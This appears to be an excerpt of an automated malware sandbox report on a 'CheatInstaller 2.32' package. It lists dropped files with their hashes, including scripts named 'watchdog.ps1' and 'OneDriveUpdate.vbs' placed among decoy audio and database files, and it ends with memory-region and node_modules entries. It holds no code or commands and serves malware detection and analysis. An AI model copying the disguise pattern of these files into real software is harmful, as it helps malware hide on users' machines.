SHA512 43b220254d6b1a130e5140307792542e148da1d81e229a8c14dab8b052ee869b4bac238114ae7b45365c57fdec47e390f14e47dea1d22e6cf0e98c6ded780af0

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_fre.txt

MD5 5b1a12edc7b4e82163e5b39694e5b630
SHA1 088d6df18ce940cf01789a27adeaa150f9dc26b7
SHA256 206bac7b50b6bd8467ccffcb6d0833c4c8c58a2e82d205f608d4127ddc3402c9
SHA512 07846ad52962fc7f07b9e950343f906db5ac09287ced6d4659dae5f99f3fc8ee02916d66557dc2a0a7edbca0a716d8b26c252642558417986532cc28428494cc

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_pp.wav

MD5 b9a061caf9b72c264ce8d906c19c3464
SHA1 3cf31d12aa3f547cb6c772de8e3911ec2c4bea4c
SHA256 842ee77250b099a931c6de1273c7852760be0f29460ee24a7528898742429a24
SHA512 69aa7baa86fc4603909eee644af1cae988e9b6b65aa526c1d3a1cc89776bfe0f02e47be32d112b19ae39d3e0c364dcfc32e1aaf1c97ff44cc555643cd0b1aadb

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_piano.wav

MD5 647de288803dbc85a8628958212cf5d1
SHA1 f8fdc3247a05fa4b7c5270f281f462a456bb9144
SHA256 d0a0c8e292be08bb8ac7d3ae7576e7b0bcb4a708a4a742be5ae7a0b8f532bce4
SHA512 21cff883d0825026bc0ee4d721c1f9ada5bd1705960c7a85b44bfaa8dd10e82c04aa863d183f36f58bd780f87deec8556943b2d1689e1745b97bc78318952f2a

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\slow_log.frm

MD5 5cf177c70e9be2f41adc86ea7e0fc48b
SHA1 9a597f4d25a0fb4837fa06b9b3792de65fae9551
SHA256 9276bfd579b31e71a0f85e8b1085e6f00aafc1428b3c5dee2e765e80c34260a3
SHA512 054f52c54dd936a87ad49f1b31fbf248962ad6909686a98e3b76c6772f7ffbb09e6ecb336c3ff6499eadd45746e407c90992fe5e93f44d0e7feee4cab1e071a1

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_timit.wav

MD5 5e5792845558976ce2ef16125f489bd4
SHA1 fd43914894e4584c2fa3911aa90a9012cc8f18bc
SHA256 19665ac028e7c15a6923ccd6489eda05058c1fe0aa688ccfd90f928cd6998ea9
SHA512 1d4c820e19ee94b369b2cd9ac4bc54158c4bd89334e950f2327f63d4657aa0039b9fa9aa8a39cb23f01b724e0d96ec345f686ba8e9f04aebf34618c9707097ca

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_specgan.wav

MD5 3fbe98cf853280c096a5f04a414754a3
SHA1 7fe6fbfe4e038926318e698ef8744d602d6be573
SHA256 92d4fc49cae28d7befe3be3e38f6fb812268900cc92196e45c40dd73855c7f5a
SHA512 8e2ca0791b5a06e8ea47dcba74c9dab643d02b13001d97630a00da0c7a5f9e210300fa4505a0f1a3da56c3a4d340f12a8f608f2226e92e51114384498e3b7f61

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps4.wav

MD5 9793e59a1399208703a40c56d340da0d
SHA1 e63580eb497bbc1c53c57ce2625e0b5d040a3ac2
SHA256 6f22e2db9fb99048c2319f9057e7e8ef8e98cc7bc0b65ca2672ab3f3f14cde7c
SHA512 042a5fcc524b7e76c360c65a48bb73f154c26008322ff8e9ff6eba5f92b52c3094501104d9aa161a6dedaddf93be250437270359cbfc8379f1c388b78a2f6ad6

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps2.wav

MD5 b688a2c39e7489f29c05803fd8927a19
SHA1 aa5e29a91c0ed3980c1b9b726fb4bf89ea171a86
SHA256 1274f50951466336f2d7d576a46c401422924ad674745abfea56edd206febc5d
SHA512 17f7ab9203ea0692301912aa33c9fb492e54f6790d812e1ab2ab93ad7e814087c9c1324640966ae4fdad540c7741326eb281d160719949aac0966a4a7f40e81f

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavenet_r9y9.wav

MD5 7434606055799acd0df5aaefadb5d43f
SHA1 290141bb0faa3bf2a3e03c979731bae1121a2a50
SHA256 f505c92ccdc51cc4ab2937de04cdc8d9e375e1eb62903f68aa349f9af1528494
SHA512 b4de8e88a37a25bd5dd85e3ed7f4d2b65d5fceb596ede961135cc753d7e9c24dabeab9e3f0859970c72d11955c7e8a0b1f857da6478f116cace2f9990a59e61e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav

MD5 3cf6b4272a954c0eab71172f96d44d21
SHA1 0569e466e145ffd07176d87a4ab49501ad87310d
SHA256 e3871041f989d13eb2e780938bde975f1f87808237ff36cc2afc656c804b10a5
SHA512 c6d5753458273809a33ecef71825b3aecd67ea7560d73a81adf8713c16743e9912a2528ac8c973339130128b426f80d5066fb1b6f658eaa281b68005aba83237

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_piano.wav

MD5 245e26e0fe6a7ed35bd527bcedae39a3
SHA1 cea66f00b80c0015c9f5058408c59e400b8eb533
SHA256 32ab5bb76b483e93635fe82adb1f42a8882148818ebc5169bd143dc48c37502a
SHA512 932b6c65ee3d79ffc823ccc906b1c894ad34e401061bd864993e16c31673e7d3136ad6e460301fcb346acc54d5d72885ea57276574a3c317fc0ed51487ef90f4

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_drums.wav

MD5 202cb197093aa6165ffc7a4b0be1d8bc
SHA1 a0531efdb7d93be82957cb4c588bae69d9340860
SHA256 32959329bc4aa6ff6e2ea4f5ad07901f9354af646e7ae54121159754c5e3b081
SHA512 69aa1ea0df10b3d1805f220c9b9c3499dc242db7d9739407b7d63f987b6f183f8b4e568e999c94c67a416dbabd364bb5e6dd85e7e0cba04e83b924dcb03e312b

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_birds.wav

MD5 e9b73798ab7b480167b01631b5d09fe9
SHA1 2690c6a93f43e7c68fe03b4eadba7541706fbf97
SHA256 138e389dcc76bf27446efa26c9456d57a7c49fb878faa4024a87c297d474d6fa
SHA512 05b1cc56a50431701caf7e59e9ef2522e083a2159b2d6ff6f7cb55071537a4d8bf91dc5b8c87211a9af6e436e477df8e3adb87bd6affe1852300988160b7808c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_birds.wav

MD5 8a42ea7e77c145b7a941207fbee3a19f
SHA1 6e4208b06a0a8fea964fd3e8bb245097b455f8d3
SHA256 e6b77e8c3ce112f95d7049d53091947405d49b66d03ea15823e3a2f1f4104c16
SHA512 c119fa79feca08bbae921b559776c0f9b5fa7717a642e6168c09a82e90ac98111fdd792d3c24042e91ab7d88143a1fa225f314b54d4f573055b48f74c8d3bd05

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_topic.frm

MD5 ccaca741f4002cb8af48d485501ec8e9
SHA1 4895716a9baf869a5ba2ec1c2d0523b7bc8a6cb3
SHA256 0e2099aa021c0a2819f8f80960d729e66f69754675bfe847af8923029a330ec1
SHA512 09f005f1e7e8f9f388031c673a593c8afac42298b6f97ff708babfbc403a952692a0bbfbab3ebbd89f8506c2ec7bdb4154f70827680b6dfd390f80054ff2910a

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\general_log.frm

MD5 ea26bb989e3e2c321a47d499d2682ae1
SHA1 a79e8c99186c20fb09f1457b3d183538e1e1b1bb
SHA256 4a208c39ac55c440fa336c3463428609db81112512f6551a1331a516a2d1da81
SHA512 07f2b43db67b76b463c1770dd6ddb445bbcefcd8f8dfb85e9c28306cf5282272805516dd3166851b66a8358e16632a09a524d6918aae8711d97939beda53137e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_tatum.wav

MD5 551ca14ad775513d80591ab8f6cc6fad
SHA1 24c53d3d387613479867d5c808ce5928a4899565
SHA256 79620a715b3a7cc5e9235034134bba84654bec53af40bde4341b7ea5acacfec1
SHA512 d33b26fcb4208d32ecf4c882a2562ae2522de554631eac1034e88480aa3887f0ec789c48fdf15c5fd93b14d5a9d7a41b796b321ac301831e78cc21641f6a4298

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.MYI

MD5 f0bb4307afbd586f0499f4023213863d
SHA1 cd978f445f02aab75b1d89c5e28e348860d8c306
SHA256 49a2cd5ce74b5969db3eb785c02fda21f207672b2348c95252b3200d05281129
SHA512 a4327e9535d84ad98b4880764a05141170febf1c02d3fb74f71d704185e8176545c15ecfa34e5c8218cc33f4b7f07deb1fe0f2c06c1b400a3798a75016de861c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_relation.MYI

MD5 b7d1f26327bf857bf6ce98ea4fda22b1
SHA1 b3f9c0dd62d5a7f533be36664f8e4954cd1f216d
SHA256 7ce3f6771b4c0a0c0e662dc51ecb460aae223bb3292eaea6c1c6f1bb805b3786
SHA512 91e83b2a3aa885e240f2634d15662954aa0d1104b85ae7bf33948b6bcffcbf763baddb3ecdabd15de53d6eda23d765716891b4dbaaf70168b837480f055e5ab2

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_piano.wav

MD5 fc78ca246d0cf0722c9131af7ce76a6d
SHA1 a6d43babe30ed9d48bba12342f2bc46285dd7f5e
SHA256 27afcb5a5cbd02fa2a1459e010a58c62ceb73530ec24f28947037b400c767490
SHA512 347a951c80cff1bc8e7c426bfb3b625777262d8f1521f97e077db10b29a8004e8deb223a01620cb93e7bb275d3a318e7119f4c9ea1d66f08b956b4d55a808890

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_drums.wav

MD5 16906e3a78e1554b83d977f1a2bfc29c
SHA1 3cd53283735624e915da74978705974a2dc7c84e
SHA256 ca043c58856d56d1770032bf1b0d7c531b64bd0d103ab3a3a49361e0c20f1843
SHA512 a08c105046d48c30e818ffb7b29278d555c116e1084af7981a4b27cab977ef05b957353b0821f6ce18bfaec37bfc4e6137c66dc20222c8878e0f25195ffacdd8

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_birds.wav

MD5 2f3d71c1ac2c6dbd1dc12daccff70aad
SHA1 eb336a58e4984de4bf7a0a30724f6b3a069ca5ea
SHA256 125da366e61bae5d0b41062fead1f0efed252170625526324861cccd5aaa4395
SHA512 ee353f29095b2c416b40aec2eb595f66a727ea2f044a39f2236e8c7a36daec769386272c9423194f9c1ff8dd10ac08bd40db8067e65f0a4811266b5b3e76de5c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_sc09.wav

MD5 f3609dc818e0a6643700bff6d94595d0
SHA1 2f5d12e710ea4806428dd47b7a8046cc3c86acb4
SHA256 3120794c48599cfd6230ee51da535572508f001713020520dcb009cbce222141
SHA512 d091cf15bd92b27dd2b619dd682f059e5559ea8212fce8d9a324e9bff4fa16586090b863a2fa5712f9eab6e333d6630daa00bc66c6b3bba4b846b50c79695410

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_ita.txt

MD5 89e2a161df2ef245781707ff93e978bc
SHA1 ab2189d5c8dca09cade0586b929f0264c327db32
SHA256 b8f747babf732bb64a9cfc60a09b79001c87eb3b37d9704174c0964a49ed6f4a
SHA512 0e78e380198330cb143b17490d4540473d359a0198888dfd59ff5b1a94a8637f0e6e8998d2ea6ef83794d41771db449bb4abdc2692872a21ebd7d585652b4115

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav

MD5 870ff6b68e3de471b3ae6d6cb83ab6aa
SHA1 107c1ba43a923226fcf7026a0d72e21f402ee186
SHA256 8b69c0c927dd918cd9ea3d20716b736cdc41c7c01534ca3f802bcb82c2444af1
SHA512 ce894f3e213f765232ee125ccf82b5c33da207d02f1fd8559febc2d3c7f6a4d4d846766d491f3dc4ce11918a44b0d85973b9ce9f2f23fe96cfa0b376edeed4e6

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.frm

MD5 ac330f2a89a6c828059d1f125cb9cb60
SHA1 a40b10eae1fba1ea43ff70b3941a165d6d0502f2
SHA256 9b2123a554181148e29bbeb66f18da5619b1fd796e4f3de49415748822fef4ec
SHA512 0fd4ac721c969496423c336128c8b3751f3752176c891d85e13cbfc226fcfa00751aab1d1d400ee6b70031b6abaa86fb975f45f30b6c0e8789df27904dedcc42

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\watchdog.ps1

MD5 beceb9c4ac840a5ac0b51d8774e63149
SHA1 ea375fee5ff404065ba724e877c9a9b01509353b
SHA256 d2011dcd715dad784b01709bd0af62c07a91aad758f6e461005178a74c2d3b34
SHA512 48e705691523f9804e152433c15142757def6e8dfa72f5dd08169576f7a5073d5e43cce1e148f7df19a566fb863cd377adfcdbeab5308b4cafe9afec9715365d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_samplernn.wav

MD5 8c5a8883d62058dea04e94ea05cfdfa3
SHA1 84d672daa67862c285a38038b2c7ab2f3a06a44e
SHA256 03758bf8e755c2cc7f851a5b72b2ec5ca179efa5ae1da9e71c2404e831e82b22
SHA512 a59dbe71da12017d06f66ab17c7ab293ef78a77e3c4b803ee10eed57eab9ab1041c5a8d8edac155a913d2d2a78fd78daffcb6c9bb3d59cdc30cd152596225686

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\event.csv

MD5 2620f56f03159589486b831d9b6adc4a
SHA1 55dfc135be75692bd64c50b429dcd5460e0b0b90
SHA256 8438f31c41c8214d92ef0227b0e45eae937e6e5221e410af1ad3735dc9e2ee71
SHA512 2915b402391b79635679f415c085646fa3fa6a888b4d00ee9be8aac101760815df6dd390b76192c5d695a116dfd2d297a1e3323b678b184e320049061b974f01

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs

MD5 214ee30dbd649af9294f254fc8c33d07
SHA1 e81a7486c5c19868abb7d39fc757f686c4124662
SHA256 d9747024f7951c01c90b39e18ebe0a490a956625422f165d53f917ae062c4e52
SHA512 f1309c116fcaa64b372946686c3a22b0574db717aef91c095fbb70cbeb4125077f363ad9ce0d4a9ec12bc9f61d61df8ef35f5ac20a6a8b9f68b95203b5f93d19

C:\Windows\Installer\MSI9E14.tmp

MD5 cac17c92ed0d30bc68ce60905e0af1ea
SHA1 29589b5816214f537ffb03a4ff9c79f1bd25908b
SHA256 e5a59959b68626f622c7a27b2a42468dbfe03a6d956b58b2cdccedf0a632d161
SHA512 041aab2032745c2f800ac05ee77073167bf37f81dee56774b498c8f1b60fdcc8f16904e909ed42ef9157dfebeada9998d5c155aa1a10df1ccd608177425acc20

C:\Windows\Installer\MSI9F11.tmp

MD5 165f730f078c7019ea5f2642f8208cda
SHA1 370f2e4d1f298b62c1d4743d0e23d2a2d41f950d
SHA256 48f509d74ca1afa44b3053e5fb0ddc15d56ca8844e9d150419891c5a38a071a6
SHA512 36868c499b28f96853fb77a1dacef2ad2a06ee7b1be41ff2782ac0f90dd247f522dc64951fa72bb77a85d930ddffe28b06eb391e5bf803e396adaa7211c183b6

memory/3824-3842-0x0000000004D30000-0x0000000004D66000-memory.dmp

memory/3824-3843-0x0000000071CE0000-0x0000000072491000-memory.dmp

memory/3824-3845-0x00000000054F0000-0x0000000005B1A000-memory.dmp

memory/3824-3846-0x0000000004EB0000-0x0000000004EC0000-memory.dmp

memory/3824-3844-0x0000000004EB0000-0x0000000004EC0000-memory.dmp

memory/3824-3848-0x0000000005440000-0x0000000005462000-memory.dmp

memory/3824-3849-0x0000000005C90000-0x0000000005CF6000-memory.dmp

memory/3824-3855-0x0000000005C20000-0x0000000005C86000-memory.dmp

memory/3824-3859-0x0000000005E00000-0x0000000006157000-memory.dmp

memory/1284-3860-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/1284-3861-0x00000221C5FC0000-0x00000221C5FD0000-memory.dmp

memory/1284-3869-0x00000221C5FC0000-0x00000221C5FD0000-memory.dmp

memory/3824-3871-0x00000000061E0000-0x00000000061FE000-memory.dmp

memory/1284-3872-0x00000221C5FC0000-0x00000221C5FD0000-memory.dmp

memory/3824-3873-0x0000000006230000-0x000000000627C000-memory.dmp

memory/1284-3875-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/1012-3876-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/1012-3885-0x000001FEBFF70000-0x000001FEBFF80000-memory.dmp

memory/1012-3886-0x000001FEBFF70000-0x000001FEBFF80000-memory.dmp

memory/3824-3887-0x0000000071CE0000-0x0000000072491000-memory.dmp

memory/1012-3888-0x000001FEBFF70000-0x000001FEBFF80000-memory.dmp

memory/1012-3890-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/3824-3891-0x0000000004EB0000-0x0000000004EC0000-memory.dmp

memory/2884-3892-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/3824-3893-0x0000000007B60000-0x00000000081DA000-memory.dmp

memory/3824-3902-0x0000000006730000-0x000000000674A000-memory.dmp

memory/3824-3903-0x0000000004EB0000-0x0000000004EC0000-memory.dmp

memory/2884-3904-0x0000022062B10000-0x0000022062B20000-memory.dmp

memory/3824-3905-0x00000000074E0000-0x0000000007576000-memory.dmp

memory/3824-3906-0x00000000067D0000-0x00000000067F2000-memory.dmp

memory/2884-3909-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/3824-3908-0x00000000081E0000-0x0000000008786000-memory.dmp

memory/3824-3910-0x0000000007770000-0x0000000007802000-memory.dmp

memory/3824-3911-0x0000000007720000-0x000000000772A000-memory.dmp

memory/4956-3912-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/4956-3920-0x0000016DCF880000-0x0000016DCF890000-memory.dmp

memory/4956-3922-0x0000016DCF880000-0x0000016DCF890000-memory.dmp

memory/3824-3923-0x0000000004EB0000-0x0000000004EC0000-memory.dmp

memory/4956-3924-0x0000016DCF880000-0x0000016DCF890000-memory.dmp

memory/4956-3926-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/3012-3935-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/3012-3937-0x000001FEC9FB0000-0x000001FEC9FC0000-memory.dmp

memory/3012-3936-0x000001FEC9FB0000-0x000001FEC9FC0000-memory.dmp

memory/3012-3939-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/3300-3948-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/3300-3949-0x000001DEB2860000-0x000001DEB2870000-memory.dmp

memory/3300-3951-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/1496-3960-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/1496-3961-0x000001D6C7190000-0x000001D6C71A0000-memory.dmp

memory/3824-3962-0x0000000004EB0000-0x0000000004EC0000-memory.dmp

memory/1496-3964-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/1040-3973-0x000001467D610000-0x000001467D620000-memory.dmp

memory/1040-3970-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/1040-3976-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/1568-3985-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/1568-3986-0x000001D7D2AF0000-0x000001D7D2B00000-memory.dmp

memory/1568-3988-0x000001D7D2AF0000-0x000001D7D2B00000-memory.dmp

memory/1568-3987-0x000001D7D2AF0000-0x000001D7D2B00000-memory.dmp

memory/1568-3990-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

C:\Windows\Installer\MSIE2C0.tmp

MD5 8d49691d4ab2fa3cd8c679c0df30c1a1
SHA1 71b8b4619a2b0632920f84f740e7b27af62a921e
SHA256 8412dc56077a9219c7cd04e0fccc2391eb62e32a86ad27e58b24d83c8e8227a5
SHA512 128b1544a4a2fde1eebeaddb2b75a122f7c29f79ad47b7bc648198fdd06047ffedd9601a4bc7808ef51153005986a0fdfb0a06409c23411d13b299bda64aa9f5

C:\Windows\Installer\MSIE2C2.tmp

MD5 ce5552c3b309a5f507b31c0af0c0cabf
SHA1 5a5a35ea887677e411ea5ea86dd6881d62db6edf
SHA256 3c2dc5ba528d5c31cefacc19f693b35512eb7d500511b0dbc79762d3f5f7842c
SHA512 4234ee20b71d6f0bed70179344c830be3b18ff53c3652c559f2bc2cd2b7dae142761a8ba77ef2102ac87351ccbb83ee50c855259dd0d7178a75b4412dc5b2389

C:\Windows\Installer\MSIE302.tmp

MD5 18db7a45912d1664716efdf6e311f5f1
SHA1 24a5d1d2addf8095e6f5e4040a2e1c44956bb141
SHA256 5ffa59b2cb0995af80de9ce944bb3e2933c42cea0d764c0af137ff842dc7fd0c
SHA512 5bc3db53b113d9098170eac6ac1fd2327e6e02f6e5e5e6a5c48e861e1ff683fd2a88928638a0f046a8b89488d6ce1f9eba9952aa34b5ab0858f671b890f250ff

C:\Config.Msi\e578f04.rbs

MD5 6a6710ffcd293cacc62234754b21903f
SHA1 bd389ede24d656b7a4f3e023cf21eb7fd15472b6
SHA256 4ef09390d4ab3fc90a2ab1b1b9f5b5aacae5f74cbeeba68f6c3897b6fdd45646
SHA512 d6298c3e857ad1e230d3d451407d434a1e8d33f44e34b1b6627fa6eec79778bd31b892bbcb83beca65877c0bf045a691d3792ac70f621ce780e4b6ef8ba53cd9

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@npmcli\git\LICENSE

MD5 a7a567b0c15ef6f269b858ec3b85eb11
SHA1 1f3474ea2534827d050295aede1e340868483d12
SHA256 565acf764f4583abe4cf4b02128f01b5d4d1b4c62c253e92df7ed6a8a8ad406b
SHA512 61ee613b7ce22b8149ed7e54e9919172db70a2254ddd30645488b6240f943d8b6524ab54043ce9af0f1b3dd6eb7674966e69dcafbb710211d9c20a42e5dc7c1f

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\cacache\lib\util\tmp.js

MD5 1d8e64ea848e005e1d0a771f1465a577
SHA1 cf9d2fe73fd6195f7b53c6b13cda15f40802f8f8
SHA256 9bc9bad862208b2ee66aeae5222d8b1d8d1d288f335fdf3ff998ad200f71ce64
SHA512 2a0a1d57ed240c9a0e95f1b87306eb66583860c2c88148db6ef5979f6f6f06e4bc6eec9fe9d6f2ad21506c4234a88404fcd155dabd82d6b507d0ba53502ad5be

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\gauge\lib\plumbing.js

MD5 ea9b89a82c6935dd42f43f4a91cd4b3e
SHA1 ced271efe695d542670cc84c98435590956d97e8
SHA256 1e7982a4080950347c5c4a33c6a4e7e6e5a6c0ae0e0fb87301e62b48fc3a75f1
SHA512 2d47928ddcb872fb0336ee5fac0389dbbf94a2a1148005783a67ae0cab9a2707f0beca660aaffb2383602f42e2d41f5bcf4b03924828613ab8e36c74e9a1f5f3

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\gauge\lib\has-color.js

MD5 12bdbddc59cab41a8daa15925d883576
SHA1 c98472fff9ca49b7df18eb1ff15d41cb0d2af64d
SHA256 bc77cc5732b948d7fe113b31ff78972d6ea336f8d15e8547542007657d41dc30
SHA512 087b2aa7b423b7f173096091b36cce6269df4d768ae80fe818044360114753d7f5d968ab8f1c0b3c8c130cbc45176ac7e6a9369325ffbad3e6b89c43c39a71c2

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\gauge\lib\error.js

MD5 528e2cb56f65929aa4376e585005f1a4
SHA1 04e38f90829460d150c24677f678be9c59a1986d
SHA256 2957dc2045a462606df224526d880fcc7a472bc992a74b0db9b23bf1984a9b20
SHA512 c49eee8427b3315ea6866f094c55db240b6d7d889a520cc3fb0400ecd25d59c064e9c137fb004f657b03d2f21be56c00fb7abef9e0ef2462d8b9ad75c112eb6d

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\gauge\lib\base-theme.js

MD5 c2d6986c3f109d0207dd06ba223cfb27
SHA1 24692c6c9557e081c53383fadb23dff2fc77233d
SHA256 7a6f7058c9f54eb3ee04ed5b3e4afad0f3abfd0b658a040e85ae8f4a455b1d5d
SHA512 782a011f8af385dc2db12d1ea5ae92923ba156b5068e095de507d433af27f1ab0dbf4f0a8b83a39a6890a58067dafa5e1e4efe030f1978329f93699ce1b910ed

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\diff\lib\index.es6.js

MD5 b0189fc844758ea7861a33d4cf3deaa2
SHA1 42b196484a16db7a66eeb56906ed26e2182799fb
SHA256 69694883a1ee6ef36c17144e2eb41e5d75b8c0f487cae980fd536bcab5960931
SHA512 46558e8dfabdbf10c92cc41358526b4d779a5e256303032cfbfaaa966d0283881fdd97380d494066efb210172eb5a6544d5906a29972db2feb9a79c5f972b6ed

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\cross-spawn\node_modules\which\which.js

MD5 2f112ac3fed09f7bc11e3f78c096e435
SHA1 cfb29894630a310ff6d56c91ee327a076ced7179
SHA256 76845e1fe7851267fb7ee72b18f2d916996d330150e31e48f4657a79e9b46b5b
SHA512 6e5617ff8dcdacdb444a61fb55aae7d19dd6addd175dc299bd20e8a6e1bf13ee105f53dac49033d0775561714b0093a88ecd9e865bdb8ddd7bb7bbe9ef990214

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\cross-spawn\node_modules\which\package.json

MD5 6bcb9e5778d80ea1512a98d73d4e3c9a
SHA1 402837c5ba60f95b309957adc4657b8fe4fb1f05
SHA256 43010039ed5e89f7186960be682b3cb5cda5ab6cdfb06cbfd4f081cf0e7b4260
SHA512 4548011d1e4ed9f5d7fb5e408476a27b2a19f3beec5ac4a9bbddebc700a77ff0fb168ecc4917576a18f22d262f82649e9ec0c1242af752a7cfa0321ea4375aad

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\cross-spawn\node_modules\which\bin\node-which

MD5 ab7317a95d1f704cb183d7c438a3e890
SHA1 5b6b3e1838316fb3f1b3b4194cdf49db0674eb17
SHA256 055f0ac4eed1a1591d033d59462972968bf3483b4cc07e163589569c0fb999f0
SHA512 322a3fdcbdc0ab2240acda547abe636d51f7f2114200491f7fc66c4353d43d37a4052df0d32f29ede80c8a768d312efae8ed28639f55c2e5a678f306a45986f9

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\cidr-regex\LICENSE

MD5 7676693aa448e7ad480d8eca57e953d6
SHA1 081863fdea26bf5db6c6348c743f2f12ca27ab72
SHA256 23e60503dc06abf04b9e535e17797b4e0f9224e6c5abf9207317d5a67c88c743
SHA512 347e964c183e7eaad433f515a3116a46a4404d3e1ffaeb066f6abb29a9b4595ea71f06b6011f1ccf7f7567994b3e469e481a43c1d7d8b0feaa95325e60766019

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\chalk\source\vendor\supports-color\index.js

MD5 75cc7f0b87ad9e857bf71b18adfcc046
SHA1 84ef36e84894efaa7aba9c1643f00608e5f1d8d0
SHA256 13b5fc8a0b139d257260d1e625726744609c24a3b58535afbb602389997e60d6
SHA512 c6abdb670adac05d631526b91554c474a88b8143c9ea8ba25971e0d4fd69de9201dd2e0230a7e8655bff9ef497ae371d9f824dcbb9c1e83202c893001ef7542c

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\cacache\lib\verify.js

MD5 c3067368e574aca2d0de5bf837b2aef3
SHA1 be0b21a75a7544e5fb7915e059c358236c329841
SHA256 898b7bf2cc4e694c80eedd1edb116c2bb3a6aad0085488d1547e5755ab53338d
SHA512 7313672dffdfd2ef948f62a57339669ef96dc3078dda77b84a7bfb50a569e8ebf3d00224ace32378d19249541380eee121ddd808aaf13acdebf36110c5fc212d

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\cacache\lib\util\hash-to-segments.js

MD5 4fde78cc8125248b8abf8a9831d497c1
SHA1 a6f608135b099314b8cb4bb36c206d2f93bf2585
SHA256 ed10c878cb3c2b8570a32954b52da3c49539549f64e36b3ce3ab38d7e524bf19
SHA512 11187c46ab16c06f8af585c0a5e55e4947da81c3967fb8d127e83c58079d4d0d4343023374ecaddef4f53123e232d9c2f396bd0dc8832a01e779b4cab4d7fc6e

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\cacache\lib\util\glob.js

MD5 a93d25b2624be6221c62e3b3b437666d
SHA1 a4ce33b8a230dad740d44b6a4f74b4522e59fa4d
SHA256 a9fd56a76f0b4c39ffd94785128e79ddbc337210b9feb4b09530616948adeb69
SHA512 58baf4c9a29291ad3bc559f421e393a450e4332b13bd2f664a1fce45769493093c8327d97fc821d15790610b40015c0ca41596141216a2c121be42d1ab89b3c8

